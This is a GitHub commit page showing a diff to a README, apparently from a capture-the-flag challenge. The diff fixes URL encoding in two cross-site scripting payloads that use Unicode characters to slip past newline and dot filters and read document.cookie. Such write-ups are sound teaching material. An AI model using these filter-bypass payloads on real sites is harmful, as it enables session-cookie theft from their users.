Skip to content

Commit 7e8282a

Browse files
authored
Update README.md
1 parent bc3d444 commit 7e8282a

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -119,7 +119,7 @@ Here we use unicode `U+2028` and `U+3002` to bypass `\n` and `.` filters.
119119

120120
```
121121
http://3.114.5.202/fd.php
122-
?q=ssl。orange。tw?xx"+document[`cookie`]%E2%80%A8-->
122+
?q=ssl。orange。tw?xx"%2bdocument[`cookie`]%E2%80%A8-->
123123
```
124124

125125
#### Unintended Solution
@@ -128,7 +128,7 @@ http://3.114.5.202/fd.php
128128

129129
```
130130
http://3.114.5.202/fd.php
131-
?q=ssl。orange。tw?`+"+document[`cookie`];(`${`
131+
?q=ssl。orange。tw?`%2b"%2bdocument[`cookie`];(`${`
132132
```
133133

134134
#### Write Ups

0 commit comments

Comments
 (0)